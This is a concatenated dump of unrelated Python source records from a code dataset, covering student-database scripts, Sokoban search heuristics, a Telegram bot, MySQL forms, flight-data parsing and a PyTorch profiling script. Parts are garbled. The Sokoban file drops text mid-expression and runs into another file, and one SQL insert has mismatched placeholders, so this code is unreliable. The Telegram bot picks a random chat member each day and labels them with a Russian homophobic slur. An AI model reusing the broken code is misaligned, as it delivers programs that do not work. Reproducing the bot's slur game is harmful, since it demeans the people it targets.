alcohol_consumption (student_id INTEGER, Daily INTEGER, Weekly INTEGER, \"\n \"PRIMARY KEY(student_id) FOREIGN KEY(student_id) REFERENCES students_info(student_id) ON DELETE CASCADE \"\n \"ON UPDATE CASCADE);\"))\n\nwith open('students.csv') as csv_data:\n data = csv.DictReader(csv_data)\n to_db = [(i['student_id'], i['Dalc'], i['Walc']) for i in data]\n\ncursor.executemany(\"INSERT INTO alcohol_consumption (student_id, Daily, Weekly) VALUES (?, ?, ?);\", to_db)\n\nconnection.commit()\nconnection.close()\n","sub_path":"SQL/SQL_DB_creation.py","file_name":"SQL_DB_creation.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"174232316","text":"import numpy as np\nimport os\nfrom search import * #for search engines\nfrom sokoban import SokobanState, Direction, sokoban_goal_state #for Sokoban specific classes and problems\nfrom test_problems import PROBLEMS\n\n#SOKOBAN HEURISTICS\ndef heur_displaced(state):\n '''trivial admissible sokoban heuristic'''\n '''INPUT: a sokoban state'''\n '''OUTPUT: a numeric value that serves as an estimate of the distance of the state to the goal.''' \n count = 0\n for box in state.boxes:\n if box not in state.storage:\n count += 1\n return count\n\ndef heur_manhattan_distance(state):\n#IMPLEMENT\n '''admissible sokoban heuristic: manhattan distance'''\n '''INPUT: a sokoban state'''\n '''OUTPUT: a numeric value that serves as an estimate of the distance of the state to the goal.''' \n #We want an admissible heuristic, which is an optimistic heuristic. \n #It must always underestimate the cost to get from the current state to the goal.\n #The sum Manhattan distance of the boxes to their closest storage spaces is such a heuristic. \n #When calculating distances, assume there are no obstacles on the grid and that several boxes can fit in one storage bin.\n #You should implement this heuristic function exactly, even if it is tempting to improve it.\n #Your function should return a numeric value; this is the estimate of the distance to the goal.\n manhattan_distance = 0\n current_state = []\n goal_state = []\n for box in state.boxes:\n current_state.append(box)\n for storage in state.storage:\n goal_state.append(storage)\n for i in range(len(goal_state)):\n manhattan_distance+= abs(current_state[i][0]-goal_state[i][0])\n manhattan_distance+= abs(current_state[i][1]-goal_state[i][1])\n return manhattan_distance\n\ndef heur_alternate(state):\n#IMPLEMENT\n '''a better sokoban heuristic'''\n '''INPUT: a sokoban state'''\n '''OUTPUT: a numeric value that serves as an estimate of the distance of the state to the goal.''' \n #heur_manhattan_distance has flaws. \n #Write a heuristic function that improves upon heur_manhattan_distance to estimate distance between the current state and the goal.\n #Your function should return a numeric value for the estimate of the distance to the goal.\n cost = 0\n if check_corners(state): return float(\"inf\")\n cost += robot_beside_nothing(state)\n cost += distance(state)\n return cost \n\ndef distance(state):\n final_cost = 0\n robot_distance = float(\"inf\")\n robot_position = state.robot\n for box in state.boxes:\n possible_storage = get_possible_storage(box, state)\n tempcost = []\n old_cost = float(\"inf\")\n for possible in possible_storage:\n if box == possible:\n old_cost = 0\n break\n else:\n new_cost = calculate_simple_distance(box, possible, state)\n if new_cost <= old_cost:\n old_cost = new_cost\n final_cost +=old_cost\n if box not in possible_storage:\n final_cost += get_closeness(box,state)\n new_robot_distance = calculate_simple_distance(robot_position, box, state)\n if new_robot_distance=state.width: return True\n if box[1] >=state.height: return True\n return False\n\ndef get_top(box):\n return (box[0],box[1]+1)\ndef get_bottom(box):\n return (box[0],box[1]-1)\ndef get_left(box):\n return (box[0]-1,box[1])\ndef get_right(box):\n return (box[0]+1,box[1])\n\ndef robot_beside_nothing(state):\n robot_position = state.robot\n cost = 0\n if (robot_position[0]+1, robot_position[1]) in state.boxes:\n test = (robot_position[0]+2, robot_position[1]) in state.boxes\n if test in state.boxes or test in state.obstacles:\n cost+= 2\n else:\n return cost\n if (robot_position[0]-1, robot_position[1]) in state.boxes:\n test = (robot_position[0]-2, robot_position[1]) in state.boxes\n if test in state.boxes or test in state.obstacles:\n cost+= 2\n else:\n return cost\n if (robot_position[0], robot_position[1]+1) in state.boxes:\n test = (robot_position[0], robot_position[1]+2) in state.boxes\n if test in state.boxes or test in state.obstacles:\n cost+= 2\n else:\n return cost\n if (robot_position[0], robot_position[1]-1) in state.boxes:\n test = (robot_position[0], robot_position[1]-2) in state.boxes\n if test in state.boxes or test in state.obstacles:\n cost+= 2\n else:\n return cost\n cost+=1\n if (robot_position[0]+1, robot_position[1]+1) in state.boxes: return cost\n if (robot_position[0]-1, robot_position[1]-1) in state.boxes: return cost\n if (robot_position[0]-1, robot_position[1]+1) in state.boxes: return cost\n if (robot_position[0]+1, robot_position[1]-1) in state.boxes: return cost\n return cost+2\n\ndef calculate_simple_distance(box, possible,state):\n return abs(box[0]-possible[0])+ abs(box[1]-possible[1])\n\ndef is_cornered(position, state):\n if position[0] == 0:\n if position[1] == 0: return True\n if position[1] == state.height-1: return True\n if (position[0], position[1]-1) in state.obstacles: return True\n if (position[0], position[1]+1) in state.obstacles: return True\n return False \n if position[0] == state.width-1:\n if position[1] == 0: return True\n if position[1] == state.height-1: return True\n if (position[0]-1, position[1]) in state.obstacles: return True\n if (position[0]+1, position[1]) in state.obstacles: return True \n return False \n testabove = (position[0]-1, position[1])\n testbelow = (position[0]+1, position[1])\n testleft = (position[0], position[1]-1)\n testright = (position[0], position[1]+1)\n if testabove in state.obstacles:\n if testleft in state.obstacles: return True\n if testright in state.obstacles: return True\n if testbelow in state.obstacles:\n if testleft in state.obstacles: return True\n if testright in state.obstacles: return True\n return False\n\ndef check_corners(state):\n for box in state.boxes:\n possible_storage = get_possible_storage(box, state)\n if box not in possible_storage:\n if is_cornered(box, state): return True\n # if is_edge(box, possible_storage,state): return True\n return False\n\ndef get_possible_storage(box,state):\n if state.restrictions != None:\n possible = state.restrictions[state.boxes[box]]\n if box in possible:\n return [box]\n for other_boxes in state.boxes:\n if box != other_boxes:\n if other_boxes in possible and other_boxes in state.restrictions[state.boxes[other_boxes]]:\n possible = possible.difference(other_boxes)\n return possible\n else:\n possible = []\n for place in state.storage:\n possible.append(place)\n if box in possible:\n return [box]\n for other_boxes in state.boxes: \n if box != other_boxes:\n if other_boxes in possible:\n possible.remove(other_boxes) \n return possible\n\n\ndef fval_function(sN, weight):\n#IMPLEMENT\n \"\"\"\n Provide a custom formula for f-value computation for Anytime Weighted A star.\n Returns the fval of the state contained in the sNode.\n\n @param sNode sN: A search node (containing a SokobanState)\n @param float weight: Weight given by Anytime Weighted A star\n @rtype: float\n \"\"\"\n \n #Many searches will explore nodes (or states) that are ordered by their f-value.\n #For UCS, the fvalue is the same as the gval of the state. For best-first search, the fvalue is the hval of the state.\n #You can use this function to create an alternate f-value for states; this must be a function of the state and the weight.\n #The function must return a numeric f-value.\n #The value will determine your state's position on the Frontier list during a 'custom' search.\n #You must initialize your search engine object as a 'custom' search engine if you supply a custom fval function.\n fval = sN.gval + weight*sN.hval\n return fval\n\n\ndef anytime_gbfs(initial_state, heur_fn, timebound = 10):\n#IMPLEMENT\n '''Provides an implementation of anytime greedy best-first search, as described in the HW1 handout'''\n '''INPUT: a sokoban state that represents the start state and a timebound (number of seconds)'''\n '''OUTPUT: A goal state (if a goal is found), else False''' \n time_end = os.times()[0]+timebound\n search = SearchEngine('best_first')\n search.init_search(initial_state, sokoban_goal_state, heur_fn)\n time_left = time_end - os.times()[0]\n output = False\n prev_cost = float(\"inf\")\n while time_left > 0:\n goal = search.search(time_left)\n if goal != False:\n if goal.gval 0:\n goal = search.search(time_left)\n if goal != False:\n if goal.gval 0:\n nums.append(re.findall('([0-9]+)', line))\n\t\nfor num in nums:\n for n in num:\n total = total + int(n)\n\n\nprint(total)","sub_path":"regex.py","file_name":"regex.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"292896724","text":"\"\"\"/pidor command.\"\"\"\n\nfrom telegram import Update, InlineKeyboardButton, InlineKeyboardMarkup\nfrom telegram.ext import CallbackContext, run_async\nfrom telegram.error import BadRequest\n\nfrom main import randomizer\nfrom main.database import *\nfrom main.constants import DEVS\nfrom main.helpers import antispam_passed, check_if_group_chat, ResetError\n\n\n@run_async\n@antispam_passed\n@check_if_group_chat\n@db_session\ndef pidor(update: Update, context: CallbackContext):\n \"\"\"Get the pidor of the day from all users stored for the chat.\"\"\"\n # Check if there is already a pidor of the day\n pidor_today = select(q.user_id.full_name for q in Pidors\n if q.chat_id == Chats[update.message.chat.id]\n and q.day == date.today())[:][:]\n if pidor_today:\n update.message.reply_text(\n text=f'Пидором дня является {pidor_today[0]}!')\n return\n keyboard = InlineKeyboardMarkup.from_button(\n InlineKeyboardButton('Реролл #1 (только админы)', callback_data='Reroll.1'))\n update.message.reply_text(text=f'Пидором дня является {getnew(update).result()}!',\n parse_mode='Markdown',\n reply_markup=keyboard)\n\n\n@run_async\n@db_session\ndef getnew(update: Update) -> str:\n \"\"\"Look for new pidor.\"\"\"\n chat_users = select(q.user_id for q in User_Stats\n if q.chat_id == Chats[update.message.chat.id])[:][:]\n # Find a pidor that's still in the chat and delete those that are gone.\n while chat_users:\n pidor = randomizer.choice(chat_users)\n try:\n pidor_data = update.message.chat.get_member(user_id=pidor.id)\n if pidor_data.status not in ['restricted', 'left', 'kicked'] and \\\n not pidor_data.user.is_bot:\n break\n else:\n delete(u for u in User_Stats\n if u.user_id == pidor\n and u.chat_id == Chats[update.message.chat.id])\n chat_users.remove(pidor)\n except BadRequest:\n delete(u for u in User_Stats\n if u.user_id == pidor\n and u.chat_id == Chats[update.message.chat.id])\n chat_users.remove(pidor)\n else:\n update.message.reply_text('Нужно больше данных!')\n raise ResetError\n # Assign a tag\n Users[pidor.id].full_name = pidor_data.user.full_name\n pidor_tag = f'[{pidor.full_name}](tg://user?id={pidor.id})'\n if not Pidors.exists(chat_id=Chats[update.message.chat.id]):\n Pidors(chat_id=Chats[update.message.chat.id],\n user_id=pidor,\n day=date.today())\n else:\n Pidors[Chats[update.message.chat.id]].user_id = pidor\n Pidors[Chats[update.message.chat.id]].day = date.today()\n # Record and return\n User_Stats[Users[pidor.id],\n Chats[update.message.chat.id]].times_pidor += 1\n return pidor_tag\n\n\n@run_async\n@db_session\ndef reroll(update: Update, context: CallbackContext):\n \"\"\"Reroll pidor of the day.\"\"\"\n admins = [u.user for u in context.bot.get_chat_administrators(\n update.callback_query.message.chat.id)]\n if update.callback_query.from_user in admins or \\\n update.callback_query.from_user.id in DEVS:\n rolln = int(\n update.callback_query.message.reply_markup.inline_keyboard[0][0].callback_data.split('.')[-1]) + 1\n keyboard = InlineKeyboardMarkup.from_button(\n InlineKeyboardButton(f'Реролл #{rolln} (только админы)',\n callback_data=f'Reroll.{rolln}'))\n update.callback_query.message.edit_text(\n text=f'Пидором дня является {getnew(update.callback_query).result()}!',\n parse_mode='Markdown',\n reply_markup=keyboard)\n","sub_path":"main/commands/pidor.py","file_name":"pidor.py","file_ext":"py","file_size_in_byte":3930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"632487797","text":"import mysql.connector\n\n#global variable allows us to update page\ntimeToUpdate = 0\n#\ndef createTables(mycursor):\n try:\n mycursor.execute(\"CREATE TABLE IF NOT EXISTS StudentInfo(BaylorID CHAR (9),\"\n \"lastName VARCHAR (30),\"\n \"firstName VARCHAR (30),\"\n \"emailAddress VARCHAR (30),\"\n \"ADV_PR_semester VARCHAR (30),\"\n \"class VARCHAR (20),\"\n \"major_minor VARCHAR(5),\"\n \"ADV_PR_grade CHAR(1),\"\n \"ADV_PR_year CHAR(4),\"\n \"PRIMARY KEY (BaylorID))\")\n except mysql.connector.Error as err:\n print(err.msg)\n\n try:\n mycursor.execute(\"CREATE INDEX assign_ibfk_1 ON StudentInfo(BaylorID)\")\n except mysql.connector.errors.ProgrammingError as err:\n index_created = True\n\n try:\n mycursor.execute(\"CREATE TABLE IF NOT EXISTS Internship(company VARCHAR (50),\"\n \"startMonth VARCHAR (15),\"\n \"startYear CHAR (4),\"\n \"endMonth VARCHAR (15),\"\n \"endYear CHAR (4),\"\n \"address VARCHAR(80),\"\n \"phoneNumber CHAR(11),\"\n \"totalHours INT,\"\n \"BaylorID CHAR(9),\"\n \"supervisorName VARCHAR(50),\"\n \"PRIMARY KEY (BaylorID, company, supervisorName),\"\n \"FOREIGN KEY (BaylorID) REFERENCES StudentInfo(BaylorID))\")\n except mysql.connector.Error as err:\n print(err.msg)\n\n\n\ndef insertIntoStudentInfo(idEntry, lastnameEntry, firstnameEntry, emailEntry, semesterEntry, classyr, major_minor, grade, year, mycursor, mydb, middleFrame, topFrame):\n try:\n sqlFormula = \"INSERT INTO StudentInfo (BaylorID, lastName, firstName, emailAddress, ADV_PR_semester, class, major_minor, ADV_PR_grade, ADV_PR_year) \" \\\n \"VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n mycursor.execute(sqlFormula, (idEntry, lastnameEntry, firstnameEntry, emailEntry, semesterEntry, classyr, major_minor, grade, year))\n mydb.commit()\n except mysql.connector.Error as error:\n print(\"could not be inserted\")\n\ndef insertIntoInternship(companyEntry, startmoEntry, startyrEntry, endmoEntry, endyrEntry, addressEntry, numberEntry, totHoursEntry, idEntry, supNameEntry, mycursor, mydb, middleFrame, topFrame):\n # print (\"The company is\", companyEntry)\n # print (\"The start month is\", startmoEntry)\n # print (\"The start year is\", startyrEntry)\n # print (\"The end month is\", endmoEntry)\n # print (\"The end year is\", endyrEntry)\n # print (\"The address is\", addressEntry)\n # print (\"The number is\", numberEntry)\n # print (\"The total hours is\", totHoursEntry)\n # print (\"The id is\", idEntry)\n # print (\"The supervisor is\", supNameEntry)\n\n try:\n sqlFormula = \"INSERT INTO Internship (company, startMonth, startYear, endMonth, endYear, address, phoneNumber, totalHours, BaylorID, supervisorName) \" \\\n \"VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n mycursor.execute(sqlFormula, (companyEntry, startmoEntry, startyrEntry, endmoEntry, endyrEntry, addressEntry, numberEntry, totHoursEntry, idEntry, supNameEntry))\n mydb.commit()\n except mysql.connector.Error as error:\n print(\"could not be inserted\")\n","sub_path":"Marquise_Working_Flask/User_Inputed_Data.py","file_name":"User_Inputed_Data.py","file_ext":"py","file_size_in_byte":3486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"438353296","text":"from GameObject import GameObject\r\nfrom EnemyComponents import *\r\nfrom PlayerComponents import *\r\nfrom Room import Room\r\n\r\n\r\nclass EntityFactory:\r\n @classmethod\r\n def create_entity(cls, entity: dict):\r\n if entity['type'] == 'Level':\r\n collision = pygame.image.load(entity[\"collision\"])\r\n return Room(collision=pygame.image.load(entity[\"collision\"]),\r\n image=pygame.image.load(entity[\"graphics\"]),)\r\n\r\n elif entity['type'] == 'Player':\r\n collision = pygame.image.load(entity[\"collision\"])\r\n mask = pygame.mask.from_surface(collision)\r\n return GameObject(PlayerStateComponent(), GraphicsComponent(player_frames), collision=mask)\r\n\r\n elif entity['type'] == 'Slime':\r\n return GameObject(EnemyStateComponent(), GraphicsComponent(slime_frames))\r\n\r\n elif entity['type'] == 'Sword':\r\n collision = pygame.image.load(entity[\"collision\"])\r\n mask = pygame.mask.from_surface(collision)\r\n return GameObject(PlayerStateComponent(), GraphicsComponent(sword_all_frames), collision = mask)\r\n\r\n elif entity['type'] == 'Shield':\r\n collision = pygame.image.load(entity[\"collision\"])\r\n mask = pygame.mask.from_surface(collision)\r\n return GameObject(PlayerStateComponent(), GraphicsComponent(shield_all_frames), collision = mask)\r\n","sub_path":"EntityFactory.py","file_name":"EntityFactory.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"130961111","text":"# Create the empty lists\nflightID = []\ntrackID = []\nx = []\ny = []\nmodec = []\ncallsign = []\nicao = []\ndest = []\nadep = []\nflighttype = []\nradar = []\ntakeofftime = []\ntime = []\n\n\nxp = []\nyp = []\n\n\n# This part opens the file to be read, it's the Schiphol outbound data file\nf = open(\"outbound.txt\", \"r\")\nlines = f.readlines()\n\n# First the file is made readable by replacing ',' with ' ',\n# then the data lists are made, flightID1 and trackID1 were assumed redundant\n# It runs from [1:421] to get rid of the first line and to have\n# only two flights for testing purposes. For only one flight, use [1:216] instead.\n\n \ntxt = []\n\nfor line in lines[1:]:\n txt = line.split(',')\n flightID.append(txt[0])\n trackID.append(txt[2])\n x.append(txt[4])\n y.append(txt[5])\n modec.append(txt[6])\n callsign.append(txt[7])\n icao.append(txt[8])\n dest.append(txt[9])\n adep.append(txt[10])\n flighttype.append(txt[11])\n radar.append(txt[12])\n takeofftime.append(txt[13])\n time.append(txt[14])\n\n# Now all the numbers have to be changed to floats\nxp = map(float,x)\nyp = map(float,y)\n\n# The time has to be made usable\n# First all the lists\ntime0 = []\ntime1 = []\ntime2 = []\ntime3 = []\ntime4 = []\ntime5 = []\ntime6 = []\n\ntime0l = []\ntime1l = []\ntime2l = []\ntime3l = []\ntime4l = []\ntime5l = []\nt = []\n\nt = []\ntl = []\nh = []\nm = []\ns = []\n\n# Now we only want the actual time in h:m:s, date is removed\nfor t0 in time:\n time0 = t0.split('-')\n time0l.append(time0)\n\nfor i in range(len(time0l)):\n time1 = time0l[i][2]\n time1l.append(time1)\n\nfor t1 in time1l:\n time2 = t1.split(' ')\n time2l.append(time2)\n\nfor j in range(len(time2l)):\n time3 = time2l[j][1]\n time3l.append(time3)\n\nfor t3 in time3l:\n time4 = t3.split(':')\n time4l.append(time4)\n\n# Now the time is converted to floats\nfor k in range(len(time4l)):\n time5 = map(float,time4l[k])\n time5l.append(time5)\n\n# And the time is calculated in seconds, which is put in the final list called t\nfor l in range(len(time5l)):\n time6 = 3600*time5l[l][0] + 60*time5l[l][1] + time5l[l][2]\n t.append(time6)\n\n# If you're interested in a specific flight, use the code below to figure out when it occurs.\n# I believe the interval should then be [first point +1:last point +2]\n\n##for p in range(len(callsign)):\n## if callsign[p] == 'TRA883':\n## print p\n\n","sub_path":"Datareading.py","file_name":"Datareading.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"245869280","text":"# função calcular se o voto é obrigatorio\n\ndef idade(a):\n from datetime import date\n return date.today().year - a\n\n\ndef voto(i):\n if i < 16:\n return 'Negado'\n elif i > 18 and i < 65:\n return 'Obrigatório'\n elif i >= 16 or i >= 65:\n return 'Opcional'\n\n\nano = int(input('Em que ano você nasceu? '))\nidade(ano) # Calcula apenas a idade\nsituacao = voto(idade(ano)) # situacao recebe o resultado da funcao voto, q tem como paramentro\n# a idade da pessoa, calculada por outra função.\nprint(f'Você tem {idade(ano)} anos: Voto {situacao}.')\n","sub_path":"CursoEmVideo/pythonProject/ex101.py","file_name":"ex101.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"302790781","text":"t = int(input())\nfor i in range(t):\n l = input()\n arr = input()\n arr = [int(k) for k in arr.split(\" \")]\n arr.sort()\n if arr[-1] % arr[0] == 0:\n print(arr[-1])\n else:\n if arr[-1] % 2 == 0 and arr[0] % 2 == 0:\n arr[0] /= 2\n print(arr[0] * arr[-1])\n","sub_path":"Code/CodeRecords/2779/49361/295192.py","file_name":"295192.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"19197086","text":"from google.appengine.api import users\r\nfrom google.appengine.ext import ndb\r\n\r\nimport webapp2\r\n\r\nfrom mydicts import *\r\nfrom myschemas import *\r\nfrom myadmin import *\r\n\r\nfrom wordtemplates import *\r\nfrom utils import *\r\nfrom modelutils import *\r\n\r\ndef deleteword(request,wordid):\r\n dict_name = request.request.get('dict_name', WORDDICT)\r\n word_key = ndb.Key(urlsafe=wordid)\r\n word = word_key.get()\r\n word.key.delete()\r\n\r\ndef clearwords(request):\r\n words_query = Word.query()\r\n words = words_query.fetch()\r\n \r\n for word in words:\r\n deleteword(request,word.key.urlsafe())\r\n\r\n# [START ListWords]\r\nclass ListWords(webapp2.RequestHandler):\r\n def get(self):\r\n self.response.write('')\r\n\r\n sdict_name = self.request.get('dict_name',WORDDICT)\r\n cdict_name = self.request.get('dict_name',CHICHARDICT)\r\n\r\n words_query = Word.query(ancestor=dict_key(sdict_name)).order(-Word.date)\r\n words = words_query.fetch()\r\n\r\n wordlist = \"\"\r\n wordlist = wordlist + \"\"\r\n for word in words:\r\n wordlist = wordlist + \"\\n\" + word.chichar +\" \" + word.translation + \" \"\r\n for ochichar in getwordchichars(self,word):\r\n wordlist = wordlist + \"\" + ochichar.chichar + \" \"\r\n viewwordform = \"\"\r\n wordlist = wordlist + \"\" + viewwordform + \" \"\r\n wordlist = wordlist + \" \"\r\n wordlist = wordlist + \"
\"\r\n\r\n self.response.write(LIST_WORD_TEMPLATE % wordlist)\r\n\r\n self.response.write('')\r\n# [END ListWords]\r\n\r\n\r\n# [END LoadWords]\r\n\r\ndef clearwords(request):\r\n word = Word()\r\n words_query = Word.query()\r\n words = words_query.fetch()\r\n \r\n for word in words:\r\n deleteword(request,word.key.urlsafe())\r\n \r\n\r\n# [START ClearWords]\r\nclass ClearWords(webapp2.RequestHandler):\r\n def post(self):\r\n clearwords(self)\r\n self.redirect('/')\r\n# [END ClearWords]\r\n\r\n# [START ViewWord]\r\nclass ViewWord(webapp2.RequestHandler):\r\n def get(self,wordid):\r\n self.response.write('')\r\n\r\n #dict_name = self.request.get('dict_name', WORDDICT)\r\n #word = Word(parent=dict_key(dict_name));\r\n\r\n\r\n dict_name = self.request.get('dict_name',WORDDICT)\r\n word_key = ndb.Key(urlsafe=wordid)\r\n #sandy = sandy_key.get()\r\n #key = ndb.Key(Word, wordid)\r\n #words_query = Word.query(Word.key == key)\r\n #word = words_query.fetch(1)[0]\r\n word = word_key.get()\r\n\r\n user = users.get_current_user()\r\n\r\n if user:\r\n udict_name = self.request.get('dict_name', USERDICT)\r\n viewstat = ViewStat(parent=dict_key(udict_name))\r\n viewstat.email = user.email()\r\n viewstat.word = word\r\n viewstat.put()\r\n\r\n \r\n wordchars = \"\"\r\n for chichar10 in lsplit(getwordchichars(self,word),10):\r\n wordchars = wordchars + \"\"\r\n for lchichar in chichar10:\r\n chichars_query = Chichar.query(Chichar.chichar == lchichar.chichar)\r\n qresult = chichars_query.fetch(1)\r\n chichar = qresult[0]\r\n wordchars = wordchars + \" \"\r\n wordchars = wordchars + \" \"\r\n wordchars = wordchars + \"
\"\r\n\r\n if not user == None and user.email() == ADMIN_ID:\r\n self.response.write(VIEW_WORD_ADMIN_TEMPLATE % ( word.chichar, word.pronunciation, word.translation, wordchars, word.key.urlsafe(),word.key.urlsafe()))\r\n else:\r\n self.response.write(VIEW_WORD_USER_TEMPLATE % ( word.chichar, word.pronunciation, word.translation, wordchars))\r\n \r\n\r\n self.response.write('')\r\n# [END ViewWord]\r\n\r\n# [START AddWord]\r\nclass AddWord(webapp2.RequestHandler):\r\n def get(self):\r\n user = users.get_current_user()\r\n if not user == None and user.email() == ADMIN_ID:\r\n self.response.write('')\r\n self.response.write(ADD_WORD_TEMPLATE)\r\n self.response.write('')\r\n else:\r\n self.response.write('Sorry, you must be ADMIN to access this page')\r\n# [END AddWord]\r\n\r\n# [START DoAddWord]\r\nclass DoAddWord(webapp2.RequestHandler):\r\n def post(self):\r\n dict_name = self.request.get('dict_name', WORDDICT)\r\n word = Word(parent=dict_key(dict_name));\r\n word.chichar = self.request.get('wordchichar')\r\n word.translation = self.request.get('wordtranslation')\r\n word.pronunciation = self.request.get('wordpronunciation')\r\n word.put()\r\n\r\n self.redirect(\"/viewword/\" + word.key.urlsafe())\r\n# [END DoAddWord]\r\n\r\n\r\n# [START EditWord]\r\nclass EditWord(webapp2.RequestHandler):\r\n def get(self,wordid):\r\n self.response.write('')\r\n\r\n dict_name = self.request.get('dict_name', WORDDICT)\r\n word_key = ndb.Key(urlsafe=wordid)\r\n # word = Word(parent=dict_key(dict_name));\r\n word = word_key.get()\r\n\r\n # Write the submission form and the footer of the page\r\n self.response.write(EDIT_WORD_TEMPLATE % ( word.key.urlsafe(), word.chichar, word.translation, word.pronunciation,word.key.urlsafe()))\r\n\r\n self.response.write('')\r\n\r\n# [END EditWord]\r\n\r\n# [START SaveWord]\r\nclass SaveWord(webapp2.RequestHandler):\r\n def post(self,wordid):\r\n save = self.request.get('save')\r\n cancel = self.request.get('cancel')\r\n dict_name = self.request.get('dict_name', WORDDICT)\r\n word_key = ndb.Key(urlsafe=wordid)\r\n # word = Word(parent=dict_key(dict_name));\r\n word = word_key.get()\r\n \r\n if save:\r\n word.chichar = self.request.get('word')\r\n word.translation = self.request.get('translation')\r\n word.pronunciation = self.request.get('pronunciation')\r\n word.put()\r\n\r\n self.redirect(\"/viewword/\" + word.key.urlsafe())\r\n# [END SaveWord]\r\n \r\ndef deleteword(request,wordid):\r\n dict_name = request.request.get('dict_name', WORDDICT)\r\n word_key = ndb.Key(urlsafe=wordid)\r\n word = word_key.get()\r\n word.key.delete()\r\n\r\n\r\n# [START DeleteWord]\r\nclass DeleteWord(webapp2.RequestHandler):\r\n def post(self,wordid):\r\n deleteword(self,wordid)\r\n self.redirect(\"/listwords\")\r\n# [END DeleteWord]\r\n\r\n# [START StatWords]\r\nclass StatWords(webapp2.RequestHandler):\r\n def get(self):\r\n self.response.write('')\r\n \r\n dict_name = self.request.get('dict_name',WORDDICT)\r\n words_query = Word.query(ancestor=dict_key(dict_name)).order(-Word.date)\r\n words = words_query.fetch()\r\n\r\n # Write the submission form and the footer of the page\r\n self.response.write(STAT_WORD_TEMPLATE % ( len(words) ))\r\n\r\n self.response.write('')\r\n# [END StatChiChars]\r\n\r\n","sub_path":"word.py","file_name":"word.py","file_ext":"py","file_size_in_byte":7436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"43820261","text":"import torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nimport torch.utils.data\nimport torchvision\nimport torchvision.transforms as T\nimport torchvision.datasets as datasets\nimport torchvision.models as models\n\n\nprint (torch.__version__)\n\n# model in pytorch repo with weights \nmodel = models.resnet50(pretrained=True)\nmodel.cuda() # load in GPU\ncudnn.benchmark = True #? needed for profiler? \n\n# pre-process images\ntransform = T.Compose([T.Resize(256), T.CenterCrop(224), T.ToTensor()])\n# Dataset load \ntrainset = torchvision.datasets.CIFAR10(root='./data', train=True, \n download=True, transform=transform)\n# Loading ( parallel workers processes - GIL problem global lock - not running in threads) \ntrainloader = torch.utils.data.DataLoader(trainset, batch_size=8,\n shuffle=True)\n# calc loss (target and training) - and minimize it\ncriterion = nn.CrossEntropyLoss().cuda()\n# back propagation \noptimizer = torch.optim.SGD(model.parameters(), lr=0.001, momentum=0.9)\n\ndevice = torch.device(\"cuda:0\")\n# switch to training mode\nmodel.train()\n\n\nimport torch.profiler\n\ndef output_fn(p):\n p.export_chrome_trace(\"./trace/worker0-batch8/worker0.pt.trace.json\")\n \n# add context manager around training loop\nwith torch.profiler.profile(\n activities=[\n torch.profiler.ProfilerActivity.CPU,\n torch.profiler.ProfilerActivity.CUDA],\n schedule=torch.profiler.schedule(\n wait=2, # skip first 2 training steps\n warmup=2, # reach steady and skip few layers, profiling happens ignores results\n active=6), # only profile 6 steps - allows to focus and skip some layers for reducing overhead(even in prod)\n on_trace_ready=output_fn,\n record_shapes=True\n) as p:\n for step, data in enumerate(trainloader, 0):\n print(\"step:{}\".format(step))\n inputs, labels = data[0].to(device=device), data[1].to(device=device)\n\n outputs = model(inputs)\n loss = criterion(outputs, labels)\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n # next training step (metadata)\n p.step() \n if step + 1 >= 10:\n break\n","sub_path":"resnet50basic.py","file_name":"resnet50basic.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"174360570","text":"from nose.tools import assert_equal\n\nfrom pyecharts.commons.utils import remove_key_with_none_value\nfrom pyecharts.options.global_options import (\n AnimationOpts,\n InitOpts,\n ToolBoxFeatureBrushOpts,\n ToolBoxFeatureDataViewOpts,\n ToolBoxFeatureDataZoomOpts,\n ToolBoxFeatureMagicTypeOpts,\n ToolBoxFeatureOpts,\n ToolBoxFeatureRestoreOpts,\n ToolBoxFeatureSaveAsImageOpts,\n ToolboxOpts,\n BrushOpts,\n DataZoomOpts,\n LegendOpts,\n VisualMapOpts,\n TooltipOpts,\n)\n\n\ndef test_animation_options_remove_none():\n option = AnimationOpts()\n expected = {\n \"animation\": True,\n \"animationDelay\": 0,\n \"animationDelayUpdate\": 0,\n \"animationDuration\": 1000,\n \"animationDurationUpdate\": 300,\n \"animationEasing\": \"cubicOut\",\n \"animationEasingUpdate\": \"cubicOut\",\n \"animationThreshold\": 2000,\n }\n assert_equal(expected, remove_key_with_none_value(option.opts))\n\n\ndef test_init_options_remove_none():\n option = InitOpts(animation_opts={})\n expected = {\n \"animationOpts\": {},\n \"height\": \"500px\",\n \"page_title\": \"Awesome-pyecharts\",\n \"renderer\": \"canvas\",\n \"theme\": \"white\",\n \"width\": \"900px\",\n }\n assert_equal(expected, remove_key_with_none_value(option.opts))\n\n\ndef test_toolbox_feature_options_remove_none():\n save_as_image = ToolBoxFeatureSaveAsImageOpts()\n restore = ToolBoxFeatureRestoreOpts()\n data_view = ToolBoxFeatureDataViewOpts()\n data_zoom = ToolBoxFeatureDataZoomOpts()\n magic_type = ToolBoxFeatureMagicTypeOpts()\n brush = 